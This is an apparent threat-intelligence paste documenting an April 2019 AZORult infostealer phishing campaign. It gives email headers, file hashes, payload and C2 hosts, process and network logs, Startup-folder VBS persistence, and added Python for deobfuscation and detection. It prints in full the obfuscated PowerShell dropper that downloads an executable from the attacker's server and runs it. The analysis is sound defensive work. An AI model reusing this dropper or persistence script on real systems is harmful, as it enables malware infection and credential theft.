#azorult_080419

VRad Apr 8th, 2019 (edited)
#IOC #OptiData #VR #AZORult #LNK #MSHTA #PowerShell

https://pastebin.com/0bX17LaY

previous_contact:
--------------
17/09/18    https://pastebin.com/MwwZ7DyY

FAQ:
https://www.bleepingcomputer.com/news/security/azorult-trojan-steals-passwords-while-hiding-as-google-update/

attack_vector
--------------
email attach .ZIP > .LNK > GET .HTA > PowerShell > GET .GIF(EXE) > %Public%\???.exe > %AppData%\0mbii\gsir.exe

email_headers
--------------
Received: from jyotiimpex.co.in ([157.230.191.189])
    by srv8.victim0.com for <user00@org88.victim0.com>; (envelope-from admin@jyotiimpex.co.in)
Reply-To: yakupabaci@ulasvana.com
From: Biju Kurian <admin@jyotiimpex.co.in>
To: user00@org88.victim0.com
Subject: Attached proposal #506697
Date: 08 Apr 2019 10:45:51 -0700

files
--------------
SHA-256     71c5bd4bc1d84bfff6f83f87576bc7b6861b227ee85ed419a8b35a23c1f64455
File name   506697.gif.zip      [Zip archive data, at least v2.0 to extract]
File size   624 B (624 bytes)

SHA-256     67ad9399978fbf5f8efcb2c3e55d06d3bc26f9892ef18462137125455ad4fb80
File name   506697.gif.lnk      [MS Windows shortcut, window=hidenormalshowminimized]
File size   1.65 KB (1686 bytes)

SHA-256     f2bb4f19e758074b31ab6e00d6e1810af709d8ea8f6f9f1152d3954c67a339f1
File name   out-761452637.hta       [HTML document, ASCII text, with very long lines]
File size   4.28 KB (4387 bytes)

SHA-256     3e3f7950441682275131bba6d26ac89941685652ec602011480302a616d2f53b
File name   506697.gif          [PE32 executable (GUI) Intel 80386, for MS Windows]
File size   674 KB (690176 bytes)

activity
**************

PL_SRC:

gingerandcoblog{.} com/test/wp/out-761452637.hta    [1st, initiate]

gingerandcoblog{.} com/test/wp/506697.gif       [2nd, main file]

C2:

cubaworts{.} gq//700/index.php

Powershell
"
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy bypass -Window 1 [void] $null;$bnFZCsAPHdW = Get-Random -Min 3 -Max 4;$AwQvehGyXOx = ([char[]]([char]97..[char]122));$uMoLAqAH = -join ($AwQvehGyXOx | Get-Random -Count $bnFZCsAPHdW | % {[Char]$_});$QBkXeDKCYCLy = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$fhMedM = $uMoLAqAH + $QBkXeDKCYCLy;$dlOPRLx=[char]0x53+[char]0x61+[char]0x4c;$XcjKCQxFekfTxHL=[char]0x49+[char]0x45+[char]0x58;$ZMIxPpGnUUPPRWE=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL jigvt $dlOPRLx;$VBStX=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;jigvt xambduhok $XcjKCQxFekfTxHL;$ITLGukyfdgq=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|xambduhok;jigvt igrvdkq $ZMIxPpGnUUPPRWE;$hJoIuIdIUjzbq = $ITLGukyfdgq + [char]0x5c + $fhMedM;;;;$chNKlgFcqw = 'aHR0cDovL2dpbmdlcmFuZGNvYmxvZy5jb20vdGVzdC93cC81MDY2OTcuZ2lm';$chNKlgFcqw=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($chNKlgFcqw));$QWTFrOflwfozpH = New-Object $VBStX;$JteOSk = $QWTFrOflwfozpH.DownloadData($chNKlgFcqw);[IO.File]::WriteAllBytes($hJoIuIdIUjzbq, $JteOSk);igrvdkq $hJoIuIdIUjzbq;;$NtkaFAJOmWuKn = @($wuHDKfhU, $sjRJmloYxc, $cfkBskr, $FugqnvRQKP);foreach($lvAJQrBp in $NtkaFAJOmWuKn){$null = $_}""
"
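The one-liner above hides its cmdlet names as [char] hex chains, re-aliases them through Set-Alias (sAL), and keeps the download URL as base64. The Python below is an added static deobfuscator, not part of VR's paste; SAMPLE is constructed from fragments of that one-liner, decoded strings are defanged in the paste's own {.} style, and only Python 3's standard library is assumed.

```python
import base64
import re

# Constructed sample: the [char]/Set-Alias/base64 fragments copied from the
# paste's PowerShell one-liner, trimmed to the pieces that matter.
SAMPLE = (
    "$dlOPRLx=[char]0x53+[char]0x61+[char]0x4c;"
    "$XcjKCQxFekfTxHL=[char]0x49+[char]0x45+[char]0x58;"
    "$ZMIxPpGnUUPPRWE=[char]0x73+[char]0x41+[char]0x70+[char]0x53;"
    "sAL jigvt $dlOPRLx;"
    "$VBStX=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62"
    "+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;"
    "jigvt xambduhok $XcjKCQxFekfTxHL;"
    "$ITLGukyfdgq=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50"
    "+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|xambduhok;"
    "jigvt igrvdkq $ZMIxPpGnUUPPRWE;"
    "$chNKlgFcqw = 'aHR0cDovL2dpbmdlcmFuZGNvYmxvZy5jb20vdGVzdC93cC81MDY2OTcuZ2lm';"
)
CHAR_CHAIN = re.compile(r"(\$\w+)\s*=\s*((?:\[char\]0x[0-9a-fA-F]{2}\+?)+)")
ALIAS_CALL = re.compile(r"(?<![\w$])(\w+)\s+(\w+)\s+(\$\w+)\s*;")
B64_LITERAL = re.compile(r"'([A-Za-z0-9+/]{16,}={0,2})'")

def defang(text):
    """Neuter URLs for reporting, in the paste's own {.} style."""
    return text.replace("http", "hxxp").replace(".", "{.}")

def decode_char_chains(script):
    """Map each variable built from [char]0xNN+... to its plaintext value."""
    return {var: "".join(chr(int(h, 16)) for h in re.findall(r"0x([0-9a-fA-F]{2})", chain))
            for var, chain in CHAR_CHAIN.findall(script)}

def resolve_aliases(script, variables):
    """Follow Set-Alias chains in source order: 'sAL x $v' makes x an alias for
    $v's value, and x (really 'sal') may then define further aliases."""
    aliases = {}
    for cmd, name, var in ALIAS_CALL.findall(script):
        if aliases.get(cmd.lower(), cmd).lower() in ("sal", "set-alias"):
            aliases[name.lower()] = variables.get(var, var)
    return aliases

def decode_base64_literals(script):
    """Decode quoted base64 strings (here the payload URL) and defang them."""
    found = []
    for lit in B64_LITERAL.findall(script):
        try:
            found.append(defang(base64.b64decode(lit, validate=True).decode("utf-8")))
        except (ValueError, UnicodeDecodeError):  # not really base64 text
            pass
    return found
```

Running the three functions on SAMPLE shows jigvt, xambduhok and igrvdkq resolve to SaL, IEX and sApS (Start-Process), the WebClient type name and $env:PUBLIC drop path, and the payload URL.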

netwrk
--------------
67.225.197.20   gingerandcoblog{.} com  GET /test/wp/out-761452637.hta  HTTP/1.1    Mozilla/4.0
67.225.197.20   gingerandcoblog{.} com  GET /test/wp/506697.gif     HTTP/1.1    No User Agent   [!..This program must be run under Win32]
51.89.0.140 cubaworts{.} gq     POST /700/index.php         HTTP/1.1    Mozilla/4.0

comp
--------------
mshta.exe       3428    TCP localhost   50097   67.225.197.20   80  SYN_SENT
mshta.exe       3428    TCP localhost   50098   67.225.197.20   80  ESTABLISHED
powershell.exe      3244    TCP localhost   50099   67.225.197.20   80  ESTABLISHED
[System]        0   TCP localhost   50100   51.89.0.140 80  TIME_WAIT

proc
--------------
"C:\Windows\system32\mshta.exe" h11p:\ gingerandcoblog{.} com/test/wp/out-761452637.hta
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy bypass -Window 1 [void] $null ...

C:\Users\Public\qkn.exe
C:\Users\operator\AppData\Roaming\0mbii\gsir.exe
C:\Users\operator\AppData\Roaming\0mbii\gsir.exe

"C:\Windows\system32\cmd.exe" /c C:\Windows\system32\timeout.exe 3 & del "gsir.exe"
C:\Windows\system32\timeout.exe  3

persist
--------------
C:\Users\operator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup             29.03.2019 11:03
0mbii.vbs
c:\users\operator\appdata\roaming\microsoft\windows\start menu\programs\startup\0mbii.vbs       29.03.2019 11:03

0mbii.vbs
- - - - -
"
SEt wdd = CreateObjEcT("wScRipt.shelL")
WdD.Run """C:\Users\operator\AppData\Roaming\0mbii\gsir.exe"""
"

drop
--------------
C:\Users\Public\qkn.exe
C:\Users\operator\AppData\Roaming\0mbii\gsir.exe [removed]
C:\Users\operator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0mbii.vbs

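The proc, persist and drop sections above describe one process chain: mshta fetching a remote HTA, PowerShell with -ExecutionPolicy bypass under it, an EXE in %Public% relocating itself to AppData\Roaming, a cmd /c timeout & del self-clean, and a Startup-folder VBS relaunching it. The Python below is an added detection example, not part of the paste: it runs those behaviours as rules over constructed Sysmon-style process-creation events (pids, the placeholder HTA host example.invalid and the wscript.exe logon launch of 0mbii.vbs are assumptions).

```python
import re

# Constructed sample: process-creation events shaped after the proc/persist
# sections of the paste; the HTA host is a placeholder, pids are invented.
EVENTS = [
    {"pid": 3428, "ppid": 1200, "image": r"C:\Windows\system32\mshta.exe",
     "cmd": r'"C:\Windows\system32\mshta.exe" http://example.invalid/test/wp/out-761452637.hta'},
    {"pid": 3244, "ppid": 3428, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy bypass -Window 1 [void] $null'},
    {"pid": 4010, "ppid": 3244, "image": r"C:\Users\Public\qkn.exe", "cmd": r"C:\Users\Public\qkn.exe"},
    {"pid": 4022, "ppid": 4010, "image": r"C:\Users\operator\AppData\Roaming\0mbii\gsir.exe",
     "cmd": r"C:\Users\operator\AppData\Roaming\0mbii\gsir.exe"},
    {"pid": 4030, "ppid": 4022, "image": r"C:\Windows\system32\cmd.exe",
     "cmd": r'"C:\Windows\system32\cmd.exe" /c C:\Windows\system32\timeout.exe 3 & del "gsir.exe"'},
    {"pid": 6000, "ppid": 5900, "image": r"C:\Windows\System32\wscript.exe",
     "cmd": r'"C:\Windows\System32\wscript.exe" "C:\Users\operator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0mbii.vbs"'},
    {"pid": 7000, "ppid": 1200, "image": r"C:\Windows\system32\notepad.exe", "cmd": "notepad.exe"},
]
SCRIPT_HOSTS = ("mshta.exe", "powershell.exe", "wscript.exe", "cscript.exe")
USER_WRITABLE = re.compile(r"^c:\\users\\(public|[^\\]+\\appdata\\roaming)\\", re.I)
STARTUP_VBS = re.compile(r"\\start menu\\programs\\startup\\[^\\\"]+\.vbs", re.I)

def basename(path):
    return path.rsplit("\\", 1)[-1].lower()

def detect(events):
    """Return (pid, rule) pairs for the behaviours seen in this AZORult chain."""
    by_pid = {e["pid"]: e for e in events}
    hits = []
    for e in events:
        img, cmd = basename(e["image"]), e["cmd"]
        parent = by_pid.get(e["ppid"], {"image": ""})
        pimg = basename(parent["image"])
        if img == "mshta.exe" and re.search(r"https?://\S+\.hta\b", cmd, re.I):
            hits.append((e["pid"], "mshta_remote_hta"))  # LNK -> mshta -> remote .HTA
        if img == "powershell.exe" and pimg in SCRIPT_HOSTS and re.search(r"-e[xp]\w*\s+bypass", cmd, re.I):
            hits.append((e["pid"], "script_host_spawns_powershell_bypass"))
        if USER_WRITABLE.match(e["image"]) and (pimg in SCRIPT_HOSTS or USER_WRITABLE.match(parent["image"])):
            hits.append((e["pid"], "exe_from_user_writable_dir"))  # %Public%\???.exe, AppData\Roaming\0mbii\gsir.exe
        if img == "cmd.exe" and re.search(r"timeout(\.exe)?\s+\d+\s*&\s*del\b", cmd, re.I):
            hits.append((e["pid"], "timeout_then_del_self_cleanup"))
        if img in ("wscript.exe", "cscript.exe") and STARTUP_VBS.search(cmd):
            hits.append((e["pid"], "startup_folder_vbs_persistence"))
    return hits
```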
# # #
https://www.virustotal.com/gui/file/71c5bd4bc1d84bfff6f83f87576bc7b6861b227ee85ed419a8b35a23c1f64455/details
https://www.virustotal.com/gui/file/67ad9399978fbf5f8efcb2c3e55d06d3bc26f9892ef18462137125455ad4fb80/details
https://www.virustotal.com/gui/file/f2bb4f19e758074b31ab6e00d6e1810af709d8ea8f6f9f1152d3954c67a339f1/details
https://www.virustotal.com/gui/file/3e3f7950441682275131bba6d26ac89941685652ec602011480302a616d2f53b/details
https://analyze.intezer.com/#/analyses/67953fad-ecb2-46b4-90d0-251e72079f8d

VR